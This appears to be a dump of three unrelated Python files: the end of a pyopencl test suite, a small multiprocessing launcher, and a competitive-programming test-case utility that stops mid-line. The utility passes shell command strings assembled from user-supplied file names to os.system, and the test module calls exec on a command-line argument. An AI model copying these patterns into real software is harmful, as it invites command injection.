support CL_ADDRESS_CLAMP") prg = cl.Program(context, """ __kernel void copy_image( __global float *dest, __read_only image2d_t src, sampler_t samp, int stride0) { int d0 = get_global_id(0); int d1 = get_global_id(1); /* const sampler_t samp = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP | CLK_FILTER_NEAREST; */ dest[d0*stride0 + d1] = read_imagef(src, samp, (float2)(d1, d0)).x; } """).build() num_channels = 1 a = np.random.rand(1024, 512, num_channels).astype(np.float32) if num_channels == 1: a = a[:, :, 0] queue = cl.CommandQueue(context) try: a_img = cl.image_from_array(context, a, num_channels) except cl.RuntimeError: import sys exc = sys.exc_info()[1] if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED: from pytest import skip skip("required image format not supported on %s" % device.name) else: raise a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes) samp = cl.Sampler(context, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) prg.copy_image(queue, a.shape, None, a_dest, a_img, samp, np.int32(a.strides[0]/a.dtype.itemsize)) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_result, a_dest) good = la.norm(a_result - a) == 0 if not good: if queue.device.type & cl.device_type.CPU: assert good, ("The image implementation on your CPU CL platform '%s' " "returned bad values. This is bad, but common." 
% queue.device.platform) else: assert good def test_image_3d(ctx_factory): #test for image_from_array for 3d image of float2 context = ctx_factory() device, = context.devices if not device.image_support: from pytest import skip skip("images not supported on %s" % device) if device.platform.vendor == "Intel(R) Corporation": from pytest import skip skip("images crashy on %s" % device) _xfail_if_pocl(device.platform, None, "pocl does not support CL_ADDRESS_CLAMP") prg = cl.Program(context, """ __kernel void copy_image_plane( __global float2 *dest, __read_only image3d_t src, sampler_t samp, int stride0, int stride1) { int d0 = get_global_id(0); int d1 = get_global_id(1); int d2 = get_global_id(2); /* const sampler_t samp = CLK_NORMALIZED_COORDS_FALSE | CLK_ADDRESS_CLAMP | CLK_FILTER_NEAREST; */ dest[d0*stride0 + d1*stride1 + d2] = read_imagef( src, samp, (float4)(d2, d1, d0, 0)).xy; } """).build() num_channels = 2 shape = (3, 4, 2) a = np.random.random(shape + (num_channels,)).astype(np.float32) queue = cl.CommandQueue(context) try: a_img = cl.image_from_array(context, a, num_channels) except cl.RuntimeError: import sys exc = sys.exc_info()[1] if exc.code == cl.status_code.IMAGE_FORMAT_NOT_SUPPORTED: from pytest import skip skip("required image format not supported on %s" % device.name) else: raise a_dest = cl.Buffer(context, cl.mem_flags.READ_WRITE, a.nbytes) samp = cl.Sampler(context, False, cl.addressing_mode.CLAMP, cl.filter_mode.NEAREST) prg.copy_image_plane(queue, shape, None, a_dest, a_img, samp, np.int32(a.strides[0]/a.itemsize/num_channels), np.int32(a.strides[1]/a.itemsize/num_channels), ) a_result = np.empty_like(a) cl.enqueue_copy(queue, a_result, a_dest) good = la.norm(a_result - a) == 0 if not good: if queue.device.type & cl.device_type.CPU: assert good, ("The image implementation on your CPU CL platform '%s' " "returned bad values. This is bad, but common." 
% queue.device.platform) else: assert good def test_copy_buffer(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) mf = cl.mem_flags a = np.random.rand(50000).astype(np.float32) b = np.empty_like(a) buf1 = cl.Buffer(context, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a) buf2 = cl.Buffer(context, mf.WRITE_ONLY, b.nbytes) cl.enqueue_copy(queue, buf2, buf1).wait() cl.enqueue_copy(queue, b, buf2).wait() assert la.norm(a - b) == 0 def test_mempool(ctx_factory): from pyopencl.tools import MemoryPool, ImmediateAllocator context = ctx_factory() queue = cl.CommandQueue(context) pool = MemoryPool(ImmediateAllocator(queue)) alloc_queue = [] e0 = 12 for e in range(e0-6, e0-4): for i in range(100): alloc_queue.append(pool.allocate(1 << e)) if len(alloc_queue) > 10: alloc_queue.pop(0) del alloc_queue pool.stop_holding() def test_mempool_2(ctx_factory): from pyopencl.tools import MemoryPool, ImmediateAllocator from random import randrange context = ctx_factory() queue = cl.CommandQueue(context) pool = MemoryPool(ImmediateAllocator(queue)) for i in range(2000): s = randrange(1 << 31) >> randrange(32) bin_nr = pool.bin_number(s) asize = pool.alloc_size(bin_nr) assert asize >= s, s assert pool.bin_number(asize) == bin_nr, s assert asize < asize*(1+1/8) @pytest.mark.parametrize("allocator_cls", [ImmediateAllocator, DeferredAllocator]) def test_allocator(ctx_factory, allocator_cls): context = ctx_factory() queue = cl.CommandQueue(context) if allocator_cls is DeferredAllocator: allocator = allocator_cls(context) else: allocator = allocator_cls(queue) mem = allocator(15) mem2 = allocator(0) assert mem is not None assert mem2 is None def test_vector_args(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) prg = cl.Program(context, """ __kernel void set_vec(float4 x, __global float4 *dest) { dest[get_global_id(0)] = x; } """).build() x = cltypes.make_float4(1, 2, 3, 4) dest = np.empty(50000, cltypes.float4) mf = cl.mem_flags dest_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=dest) prg.set_vec(queue, dest.shape, None, x, dest_buf) cl.enqueue_copy(queue, dest, dest_buf).wait() assert (dest == x).all() def test_header_dep_handling(ctx_factory): context = ctx_factory() from os.path import exists assert exists("empty-header.h") # if this fails, change dir to pyopencl/test kernel_src = """ #include <empty-header.h> kernel void zonk(global int *a) { *a = 5; } """ import os cl.Program(context, kernel_src).build(["-I", os.getcwd()]) cl.Program(context, kernel_src).build(["-I", os.getcwd()]) def test_context_dep_memoize(ctx_factory): context = ctx_factory() from pyopencl.tools import context_dependent_memoize counter = [0] @context_dependent_memoize def do_something(ctx): counter[0] += 1 do_something(context) do_something(context) assert counter[0] == 1 def test_can_build_and_run_binary(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) device = queue.device program = cl.Program(ctx, """ __kernel void simple(__global float *in, __global float *out) { out[get_global_id(0)] = in[get_global_id(0)]; }""") program.build() binary = program.get_info(cl.program_info.BINARIES)[0] foo = cl.Program(ctx, [device], [binary]) foo.build() n = 256 a_dev = cl.clrandom.rand(queue, n, np.float32) dest_dev = cl_array.empty_like(a_dev) foo.simple(queue, (n,), (16,), a_dev.data, dest_dev.data) def test_enqueue_barrier_marker(ctx_factory): ctx = ctx_factory() # Still relevant on pocl 1.0RC1. 
_xfail_if_pocl( ctx.devices[0].platform, (1, 0), "pocl crashes on enqueue_barrier") queue = cl.CommandQueue(ctx) if queue._get_cl_version() >= (1, 2) and cl.get_cl_header_version() <= (1, 1): pytest.skip("CL impl version >= 1.2, header version <= 1.1--cannot be sure " "that clEnqueueWaitForEvents is implemented") cl.enqueue_barrier(queue) evt1 = cl.enqueue_marker(queue) evt2 = cl.enqueue_marker(queue, wait_for=[evt1]) cl.enqueue_barrier(queue, wait_for=[evt1, evt2]) def test_wait_for_events(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) evt1 = cl.enqueue_marker(queue) evt2 = cl.enqueue_marker(queue) cl.wait_for_events([evt1, evt2]) def test_unload_compiler(platform): if (platform._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2)): from pytest import skip skip("clUnloadPlatformCompiler is only available in OpenCL 1.2") _xfail_if_pocl(platform, (0, 13), "pocl does not support unloading compiler") if platform.vendor == "Intel(R) Corporation": from pytest import skip skip("Intel proprietary driver does not support unloading compiler") cl.unload_platform_compiler(platform) def test_platform_get_devices(ctx_factory): ctx = ctx_factory() platform = ctx.devices[0].platform if platform.name == "Apple": pytest.xfail("Apple doesn't understand all the values we pass " "for dev_type") dev_types = [cl.device_type.ACCELERATOR, cl.device_type.ALL, cl.device_type.CPU, cl.device_type.DEFAULT, cl.device_type.GPU] if (platform._get_cl_version() >= (1, 2) and cl.get_cl_header_version() >= (1, 2) and not platform.name.lower().startswith("nvidia")): dev_types.append(cl.device_type.CUSTOM) for dev_type in dev_types: print(dev_type) devs = platform.get_devices(dev_type) if dev_type in (cl.device_type.DEFAULT, cl.device_type.ALL, getattr(cl.device_type, "CUSTOM", None)): continue for dev in devs: assert dev.type & dev_type == dev_type def test_user_event(ctx_factory): ctx = ctx_factory() if (ctx._get_cl_version() < (1, 1) and cl.get_cl_header_version() < (1, 1)): from pytest import skip skip("UserEvent is only available in OpenCL 1.1") # https://github.com/pocl/pocl/issues/201 _xfail_if_pocl(ctx.devices[0].platform, (0, 13), "pocl's user events don't work right") status = {} def event_waiter1(e, key): e.wait() status[key] = True def event_waiter2(e, key): cl.wait_for_events([e]) status[key] = True from threading import Thread from time import sleep evt = cl.UserEvent(ctx) Thread(target=event_waiter1, args=(evt, 1)).start() sleep(.05) if status.get(1, False): raise RuntimeError("UserEvent triggered before set_status") evt.set_status(cl.command_execution_status.COMPLETE) sleep(.05) if not status.get(1, False): raise RuntimeError("UserEvent.wait timeout") assert evt.command_execution_status == cl.command_execution_status.COMPLETE evt = cl.UserEvent(ctx) Thread(target=event_waiter2, args=(evt, 2)).start() sleep(.05) if status.get(2, False): raise RuntimeError("UserEvent triggered before set_status") evt.set_status(cl.command_execution_status.COMPLETE) sleep(.05) if not status.get(2, False): raise RuntimeError("cl.wait_for_events timeout on UserEvent") assert evt.command_execution_status == cl.command_execution_status.COMPLETE def test_buffer_get_host_array(ctx_factory): if cl._PYPY: # FIXME pytest.xfail("Buffer.get_host_array not yet working on pypy") ctx = ctx_factory() mf = cl.mem_flags host_buf = np.random.rand(25).astype(np.float32) buf = cl.Buffer(ctx, mf.READ_WRITE | mf.USE_HOST_PTR, hostbuf=host_buf) host_buf2 = buf.get_host_array(25, np.float32) assert (host_buf == 
host_buf2).all() assert (host_buf.__array_interface__["data"][0] == host_buf.__array_interface__["data"][0]) assert host_buf2.base is buf buf = cl.Buffer(ctx, mf.READ_WRITE | mf.ALLOC_HOST_PTR, size=100) try: host_buf2 = buf.get_host_array(25, np.float32) assert False, ("MemoryObject.get_host_array should not accept buffer " "without USE_HOST_PTR") except cl.LogicError: pass host_buf = np.random.rand(25).astype(np.float32) buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=host_buf) try: host_buf2 = buf.get_host_array(25, np.float32) assert False, ("MemoryObject.get_host_array should not accept buffer " "without USE_HOST_PTR") except cl.LogicError: pass def test_program_valued_get_info(ctx_factory): ctx = ctx_factory() prg = cl.Program(ctx, """ __kernel void reverse(__global float *out) { out[get_global_id(0)] *= 2; } """).build() knl = prg.reverse assert knl.program == prg knl.program.binaries[0] def test_event_set_callback(ctx_factory): import sys if sys.platform.startswith("win"): pytest.xfail("Event.set_callback not present on Windows") ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "event callbacks") if ctx._get_cl_version() < (1, 1): pytest.skip("OpenCL 1.1 or newer required for set_callback") a_np = np.random.rand(50000).astype(np.float32) b_np = np.random.rand(50000).astype(np.float32) got_called = [] def cb(status): got_called.append(status) mf = cl.mem_flags a_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np) b_g = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=b_np) prg = cl.Program(ctx, """ __kernel void sum(__global const float *a_g, __global const float *b_g, __global float *res_g) { int gid = get_global_id(0); res_g[gid] = a_g[gid] + b_g[gid]; } """).build() res_g = cl.Buffer(ctx, mf.WRITE_ONLY, a_np.nbytes) uevt = cl.UserEvent(ctx) evt = prg.sum(queue, a_np.shape, None, a_g, b_g, res_g, wait_for=[uevt]) evt.set_callback(cl.command_execution_status.COMPLETE, cb) uevt.set_status(cl.command_execution_status.COMPLETE) queue.finish() counter = 0 # yuck while not got_called: from time import sleep sleep(0.01) # wait up to five seconds (?!) 
counter += 1 if counter >= 500: break assert got_called def test_global_offset(ctx_factory): context = ctx_factory() queue = cl.CommandQueue(context) _xfail_if_pocl_gpu(queue.device, "global offset") prg = cl.Program(context, """ __kernel void mult(__global float *a) { a[get_global_id(0)] *= 2; } """).build() n = 50 a = np.random.rand(n).astype(np.float32) queue = cl.CommandQueue(context) mf = cl.mem_flags a_buf = cl.Buffer(context, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) step = 10 for ofs in range(0, n, step): prg.mult(queue, (step,), None, a_buf, global_offset=(ofs,)) a_2 = np.empty_like(a) cl.enqueue_copy(queue, a_2, a_buf) assert (a_2 == 2*a).all() def test_sub_buffers(ctx_factory): ctx = ctx_factory() if (ctx._get_cl_version() < (1, 1) or cl.get_cl_header_version() < (1, 1)): from pytest import skip skip("sub-buffers are only available in OpenCL 1.1") alignment = ctx.devices[0].mem_base_addr_align queue = cl.CommandQueue(ctx) n = 30000 a = (np.random.rand(n) * 100).astype(np.uint8) mf = cl.mem_flags a_buf = cl.Buffer(ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf=a) start = (5000 // alignment) * alignment stop = start + 20 * alignment a_sub_ref = a[start:stop] a_sub = np.empty_like(a_sub_ref) cl.enqueue_copy(queue, a_sub, a_buf[start:stop]) assert np.array_equal(a_sub, a_sub_ref) def test_spirv(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) if (ctx._get_cl_version() < (2, 1) or cl.get_cl_header_version() < (2, 1)): pytest.skip("SPIR-V program creation only available " "in OpenCL 2.1 and higher") n = 50000 a_dev = cl.clrandom.rand(queue, n, np.float32) b_dev = cl.clrandom.rand(queue, n, np.float32) dest_dev = cl_array.empty_like(a_dev) with open("add-vectors-%d.spv" % queue.device.address_bits, "rb") as spv_file: spv = spv_file.read() prg = cl.Program(ctx, spv).build() if (not prg.all_kernels() and queue.device.platform.name.startswith("AMD Accelerated")): pytest.skip("SPIR-V program creation on AMD did not result in any kernels") prg.sum(queue, a_dev.shape, None, a_dev.data, b_dev.data, dest_dev.data) assert la.norm((dest_dev - (a_dev+b_dev)).get()) < 1e-7 def test_coarse_grain_svm(ctx_factory): import sys is_pypy = "__pypy__" in sys.builtin_module_names ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "SVM") dev = ctx.devices[0] from pyopencl.characterize import has_coarse_grain_buffer_svm from pytest import skip if not has_coarse_grain_buffer_svm(queue.device): skip("device does not support coarse-grain SVM") if ("AMD" in dev.platform.name and dev.type & cl.device_type.CPU): pytest.xfail("AMD CPU doesn't do coarse-grain SVM") if ("AMD" in dev.platform.name and dev.type & cl.device_type.GPU): pytest.xfail("AMD GPU crashes on SVM unmap") n = 3000 svm_ary = cl.SVM(cl.csvm_empty(ctx, (n,), np.float32, alignment=64)) if not is_pypy: # https://bitbucket.org/pypy/numpy/issues/52 assert isinstance(svm_ary.mem.base, cl.SVMAllocation) cl.enqueue_svm_memfill(queue, svm_ary, np.zeros((), svm_ary.mem.dtype)) with svm_ary.map_rw(queue) as ary: ary.fill(17) orig_ary = ary.copy() prg = cl.Program(ctx, """ __kernel void twice(__global float *a_g) { a_g[get_global_id(0)] *= 2; } """).build() prg.twice(queue, svm_ary.mem.shape, None, svm_ary) with svm_ary.map_ro(queue) as ary: print(ary) assert np.array_equal(orig_ary*2, ary) new_ary = np.empty_like(orig_ary) new_ary.fill(-1) if ctx.devices[0].platform.name != "Portable Computing Language": # "Blocking memcpy is unimplemented (clEnqueueSVMMemcpy.c:61)" # in pocl up to and including 1.0rc1. 
cl.enqueue_copy(queue, new_ary, svm_ary) assert np.array_equal(orig_ary*2, new_ary) # {{{ https://github.com/inducer/pyopencl/issues/372 buf_arr = cl.svm_empty(ctx, cl.svm_mem_flags.READ_ONLY, 10, np.int32) out_arr = cl.svm_empty(ctx, cl.svm_mem_flags.READ_WRITE, 10, np.int32) svm_buf_arr = cl.SVM(buf_arr) svm_out_arr = cl.SVM(out_arr) with svm_buf_arr.map_rw(queue) as ary: ary.fill(17) prg_ro = cl.Program(ctx, r""" __kernel void twice_ro(__global int *out_g, __global int *in_g) { out_g[get_global_id(0)] = 2*in_g[get_global_id(0)]; } """).build() prg_ro.twice_ro(queue, buf_arr.shape, None, svm_out_arr, svm_buf_arr) with svm_out_arr.map_ro(queue) as ary: print(ary) # }}} def test_fine_grain_svm(ctx_factory): import sys is_pypy = "__pypy__" in sys.builtin_module_names ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "GPU SVM") from pyopencl.characterize import has_fine_grain_buffer_svm from pytest import skip if not has_fine_grain_buffer_svm(queue.device): skip("device does not support fine-grain SVM") n = 3000 ary = cl.fsvm_empty(ctx, n, np.float32, alignment=64) if not is_pypy: # https://bitbucket.org/pypy/numpy/issues/52 assert isinstance(ary.base, cl.SVMAllocation) ary.fill(17) orig_ary = ary.copy() prg = cl.Program(ctx, """ __kernel void twice(__global float *a_g) { a_g[get_global_id(0)] *= 2; } """).build() prg.twice(queue, ary.shape, None, cl.SVM(ary)) queue.finish() print(ary) assert np.array_equal(orig_ary*2, ary) @pytest.mark.parametrize("dtype", [ np.uint, cltypes.uint2, ]) def test_map_dtype(ctx_factory, dtype): if cl._PYPY: # FIXME pytest.xfail("enqueue_map_buffer not yet working on pypy") ctx = ctx_factory() queue = cl.CommandQueue(ctx) dt = np.dtype(dtype) b = pyopencl.Buffer(ctx, pyopencl.mem_flags.READ_ONLY, dt.itemsize) array, ev = pyopencl.enqueue_map_buffer(queue, b, pyopencl.map_flags.WRITE, 0, (1,), dt) with array.base: print(array.dtype) assert array.dtype == dt def test_compile_link(ctx_factory): ctx = ctx_factory() if ctx._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2): pytest.skip("Context and ICD loader must understand CL1.2 for compile/link") platform = ctx.devices[0].platform if platform.name == "Apple": pytest.skip("Apple doesn't like our compile/link test") queue = cl.CommandQueue(ctx) vsink_prg = cl.Program(ctx, """//CL// void value_sink(float x) { } """).compile() main_prg = cl.Program(ctx, """//CL// void value_sink(float x); __kernel void experiment() { value_sink(3.1415f + get_global_id(0)); } """).compile() z = cl.link_program(ctx, [vsink_prg, main_prg], devices=ctx.devices) z.experiment(queue, (128**2,), (128,)) queue.finish() def test_copy_buffer_rect(ctx_factory): ctx = ctx_factory() queue = cl.CommandQueue(ctx) _xfail_if_pocl_gpu(queue.device, "rectangular copies") arr1 = cl_array.zeros(queue, (2, 3), "f") arr2 = cl_array.zeros(queue, (4, 5), "f") arr1.fill(1) cl.enqueue_copy( queue, arr2.data, arr1.data, src_origin=(0, 0), dst_origin=(1, 1), region=arr1.shape[::-1]) def test_threaded_nanny_events(ctx_factory): # https://github.com/inducer/pyopencl/issues/296 import gc import threading def create_arrays_thread(n1=10, n2=20): ctx = ctx_factory() queue = cl.CommandQueue(ctx) for i1 in range(n2): for i in range(n1): acl = cl.array.zeros(queue, 10, dtype=np.float32) acl.get() # Garbage collection triggers the error print("collected ", str(gc.collect())) print("stats ", gc.get_stats()) t1 = threading.Thread(target=create_arrays_thread) t2 = threading.Thread(target=create_arrays_thread) t1.start() t2.start() 
    t1.join()
    t2.join()


@pytest.mark.parametrize("empty_shape", [(0,), (3, 0, 2)])
def test_empty_ndrange(ctx_factory, empty_shape):
    ctx = ctx_factory()
    queue = cl.CommandQueue(ctx)

    if ctx._get_cl_version() < (1, 2) or cl.get_cl_header_version() < (1, 2):
        pytest.skip("OpenCL 1.2 required for empty NDRange support")

    a = cl_array.zeros(queue, empty_shape, dtype=np.float32)

    prg = cl.Program(ctx, """
        __kernel void add_two(__global float *a_g)
        {
            a_g[get_global_id(0)] += 2;
        }
        """).build()

    prg.add_two(queue, a.shape, None, a.data, allow_empty_ndrange=True)


if __name__ == "__main__":
    # make sure that import failures get reported, instead of skipping the tests.
    import pyopencl  # noqa
    import sys
    if len(sys.argv) > 1:
        exec(sys.argv[1])
    else:
        from pytest import main
        main([__file__])
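
# Usage note (added commentary, not part of the original test file): pyopencl's
# test fixtures honor the PYOPENCL_TEST environment variable to select the
# platform/device the ctx_factory fixture creates, so a typical invocation of
# this module might look like (assuming a POCL-style portable platform is
# installed):
#
#   PYOPENCL_TEST=portable python -m pytest -k "svm or sub_buffers" <this file>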
test_multi_processing_approach.py
# class approach for dynamic plotting
import multiprocessing

import test_dynamic_plotting as plotter
import test_optmizing_BPM as BPM
import tests_rpm as RPM

BPM_proc = multiprocessing.Process(target=BPM.run_it)
plotter_proc = multiprocessing.Process(target=plotter.run_it)
RPM_proc = multiprocessing.Process(target=RPM.run_it)

BPM_proc.start()
RPM_proc.start()
plotter_proc.start()

# TODO: make dynamic plotter and BPM callable
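
# A minimal sketch (an assumption, not part of the original script): joining
# the worker processes keeps the parent alive until all three runners return
# and avoids leaving orphaned child processes behind on exit.
for proc in (BPM_proc, RPM_proc, plotter_proc):
    proc.join()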
util.py
# coding: utf-8 import sys import json import re import os import functools import platform import threading try: from bs4 import BeautifulSoup as bs import requests as rq from argparse import ArgumentParser except: err = """ You haven't installed the required dependencies. Run 'python setup.py install' to install the dependencies. """ print(err) sys.exit(0) class Utilities: cache_dir = os.path.join(os.path.expanduser('~'), '.cache', 'ACedIt') colors = { 'GREEN': '\033[92m', 'YELLOW': '\033[93m', 'RED': '\033[91m', 'ENDC': '\033[0m', 'BOLD': '\033[1m', } @staticmethod def parse_flags(supported_sites): """ Utility function to parse command line flags """ parser = ArgumentParser() parser.add_argument('-s', '--site', dest='site', choices=supported_sites, help='The competitive programming platform, e.g. codeforces, codechef etc') parser.add_argument('-c', '--contest', dest='contest', help='The name of the contest, e.g. JUNE17, LTIME49, COOK83 etc') parser.add_argument('-p', '--problem', dest='problem', help='The problem code, e.g. OAK, PRMQ etc') parser.add_argument('-f', '--force', dest='force', action='store_true', help='Force download the test cases, even if they are cached') parser.add_argument('--run', dest='source_file', help='Name of source file to be run') parser.add_argument('--set-default-site', dest='default_site', choices=supported_sites, help='Name of default site to be used when -s flag is not specified') parser.add_argument('--set-default-contest', dest='default_contest', help='Name of default contest to be used when -c flag is not specified') parser.add_argument('--clear-cache', dest='clear_cache', action='store_true', help='Clear cached test cases for a given site. Takes default site if -s flag is omitted') parser.set_defaults(force=False, clear_cache=False) args = parser.parse_args() flags = {} if args.site is None or args.contest is None: import json site, contest = None, None try: with open(os.path.join(Utilities.cache_dir, 'constants.json'), 'r') as f: data = f.read() data = json.loads(data) site = data.get( 'default_site', None) if args.site is None else args.site contest = data.get( 'default_contest', None) if args.contest is None else args.contest except: pass flags['site'] = site flags['contest'] = contest if not site == 'spoj' else None else: flags['site'] = args.site flags['contest'] = args.contest flags['problem'] = args.problem flags['force'] = args.force flags['clear_cache'] = args.clear_cache flags['source'] = args.source_file flags['default_site'] = args.default_site flags['default_contest'] = args.default_contest return flags @staticmethod def set_constants(key, value): """ Utility method to set default site and contest """ with open(os.path.join(Utilities.cache_dir, 'constants.json'), 'r+') as f: data = f.read() data = json.loads(data) data[key] = value f.seek(0) f.write(json.dumps(data, indent=2)) f.truncate() print('Set %s to %s' % (key, value)) @staticmethod def check_cache(site, contest, problem): """ Method to check if the test cases already exist in cache If not, create the directory structure to store test cases """ if problem is None: if not os.path.isdir(os.path.join(Utilities.cache_dir, site, contest)): os.makedirs(os.path.join(Utilities.cache_dir, site, contest)) return False # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest if os.path.isdir(os.path.join(Utilities.cache_dir, site, contest, problem)): return True else: os.makedirs(os.path.join(Utilities.cache_dir, site, contest, problem)) return 
False @staticmethod def clear_cache(site): """ Method to clear cached test cases """ confirm = input( 'Remove entire cache for site %s? (y/N) : ' % (site)) if confirm == 'y': from shutil import rmtree try: rmtree(os.path.join(Utilities.cache_dir, site)) except: print('Some error occured. Try again.') return os.makedirs(os.path.join(Utilities.cache_dir, site)) print('Done.') @staticmethod def store_files(site, contest, problem, inputs, outputs): """ Method to store the test cases in files """ # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest for i, inp in enumerate(inputs): filename = os.path.join( Utilities.cache_dir, site, contest, problem, 'Input' + str(i)) with open(filename, 'w') as handler: handler.write(inp) for i, out in enumerate(outputs): filename = os.path.join( Utilities.cache_dir, site, contest, problem, 'Output' + str(i)) with open(filename, 'w') as handler: handler.write(out) @staticmethod def download_problem_testcases(args): """ Download test cases for a given problem """ if args['site'] == 'codeforces': platform = Codeforces(args) elif args['site'] == 'codechef': platform = Codechef(args) elif args['site'] == 'spoj': platform = Spoj(args) elif args['site'] == 'atcoder': platform = AtCoder(args) else: platform = Hackerrank(args) is_in_cache = Utilities.check_cache( platform.site, platform.contest, platform.problem) if not args['force'] and is_in_cache: print('Test cases found in cache...') sys.exit(0) platform.scrape_problem() @staticmethod def download_contest_testcases(args): """ Download test cases for all problems in a given contest """ if args['site'] == 'codeforces': platform = Codeforces(args) elif args['site'] == 'codechef': platform = Codechef(args) elif args['site'] == 'hackerrank': platform = Hackerrank(args) elif args['site'] == 'atcoder': platform = AtCoder(args) Utilities.check_cache( platform.site, platform.contest, platform.problem) platform.scrape_contest() @staticmethod def input_file_to_string(path, num_cases): """ Method to return sample inputs as a list """ inputs = [] for i in range(num_cases): with open(os.path.join(path, 'Input' + str(i)), 'r') as fh: inputs += [fh.read()] return inputs @staticmethod def cleanup(num_cases, basename, extension): """ Method to clean up temporarily created files """ for i in range(num_cases): if os.path.isfile('temp_output' + str(i)): os.remove('temp_output' + str(i)) if extension == 'java': os.system('rm ' + basename + '*.class') if extension == 'cpp': os.system('rm ' + basename) @staticmethod def handle_kbd_interrupt(site, contest, problem): """ Method to handle keyboard interrupt """ from shutil import rmtree print('Cleaning up...') # Handle case for SPOJ specially as it does not have contests contest = '' if site == 'spoj' else contest if problem is not None: path = os.path.join(Utilities.cache_dir, site, contest, problem) if os.path.isdir(path): rmtree(path) else: path = os.path.join(Utilities.cache_dir, site, contest) if os.path.isdir(path): rmtree(path) print('Done. Exiting gracefully.') @staticmethod def run_solution(args): """ Method to run and test the user's solution against sample cases """ problem = args['source'] extension = problem.split('.')[-1] problem = problem.split('.')[0] basename = problem.split('/')[-1] problem_path = os.path.join(os.getcwd(), problem) if not os.path.isfile(problem_path + '.' 
+ extension): print('ERROR : No such file') sys.exit(0) problem_code = args['problem'] if args['problem'] else basename contest_code = '' if args['site'] == 'spoj' else args['contest'] testcases_path = os.path.join(Utilities.cache_dir, args[ 'site'], contest_code, problem_code) if os.path.isdir(testcases_path): num_cases = len(os.listdir(testcases_path)) // 2 results, expected_outputs, user_outputs = [], [], [] if extension in ['c', 'cpp', 'java', 'py', 'hs', 'rb']: # Compiler flags taken from http://codeforces.com/blog/entry/79 compiler = { 'hs': 'ghc --make -O -dynamic -o ' + basename, 'py': None, 'rb': None, 'c': '/usr/local/bin/gcc-9 -DONLINE_JUDGE -fno-asm -lm -O2 -o ' + basename, 'cpp': '/usr/local/bin/g++-9 -DONLINE_JUDGE -lm -x c++ -O2 -std=c++14 -o ' + basename, 'java': 'javac -d .' }[extension] execute_command = { 'py': 'python \'' + problem_path + '.' + extension + '\'', 'rb': 'ruby \'' + problem_path + '.' + extension + '\'', 'hs': './' + basename, 'c': './' + basename, 'cpp': './' + basename, 'java': 'java -DONLINE_JUDGE=true -Duser.language=en -Duser.region=US -Duser.variant=US ' + basename }[extension] if compiler is None: compile_status = 0 else: compile_status = os.system( compiler + ' \'' + problem_path + '.' + extension + '\'') if compile_status == 0: # Compiled successfully timeout_command = 'timeout' if platform.system() == 'Linux' else 'gtimeout' for i in range(num_cases): status = os.system(timeout_command + ' 2s ' + execute_command + ' < ' + os.path.join( testcases_path, 'Input' + str(i)) + ' > temp_output' + str(i)) with open(os.path.join(testcases_path, 'Output' + str(i)), 'r') as out_handler: expected_output = out_handler.read().strip().split('\n') expected_output = '\n'.join( [line.strip() for line in expected_output]) expected_outputs += [expected_output] if status == 31744: # Time Limit Exceeded results += [Utilities.colors['BOLD'] + Utilities.colors[ 'YELLOW'] + 'TLE' + Utilities.colors['ENDC']] user_outputs += [''] elif status == 0: # Ran successfully with open('temp_output' + str(i), 'r') as temp_handler: user_output = temp_handler.read().strip().split('\n') user_output = '\n'.join( [line.strip() for line in user_output]) user_outputs += [user_output] if expected_output == user_output: # All Correct results += [Utilities.colors['BOLD'] + Utilities.colors[ 'GREEN'] + 'AC' + Utilities.colors['ENDC']] else: # Wrong Answer results += [Utilities.colors['BOLD'] + Utilities.colors[ 'RED'] + 'WA' + Utilities.colors['ENDC']] else: # Runtime Error results += [Utilities.colors['BOLD'] + Utilities.colors['RED'] + 'RTE' + Utilities.colors['ENDC']] user_outputs += [''] else: # Compilation error occurred message = Utilities.colors['BOLD'] + Utilities.colors[ 'RED'] + 'Compilation error. Not run against test cases' + Utilities.colors['ENDC'] + '.' 
print(message) sys.exit(0) else: print('Supports only C, C++, Python, Java, Ruby and Haskell as of now.') sys.exit(0) from terminaltables import AsciiTable table_data = [['Serial No', 'Input', 'Expected Output', 'Your Output', 'Result']] inputs = Utilities.input_file_to_string(testcases_path, num_cases) for i in range(num_cases): row = [ i + 1, inputs[i], expected_outputs[i], user_outputs[i] if any(sub in results[i] for sub in ['AC', 'WA']) else 'N/A', results[i] ] table_data.append(row) table = AsciiTable(table_data) print(table.table) # Clean up temporary files Utilities.cleanup(num_cases, basename, extension) else: print('Test cases not found locally...') args['problem'] = problem_code args['force'] = True args['source'] = problem + '.' + extension Utilities.download_problem_testcases(args) print('Running your solution against sample cases...') Utilities.run_solution(args) @staticmethod def get_html(url): """ Utility function get the html content of an url """ sys.setrecursionlimit(10000) MAX_TRIES = 3 try: for try_count in range(MAX_TRIES): r = rq.get(url) if r.status_code == 200: break if try_count >= MAX_TRIES: print('Could not fetch content. Please try again.') sys.exit(0) except Exception as e: print('Please check your internet connection and try again.') sys.exit(0) return r class Platform: """ Base class for platforms """ def __init__(self, args): self.site = args['site'] self.contest = args['contest'] self.force_download = args['force'] self.responses = [] self.lock = 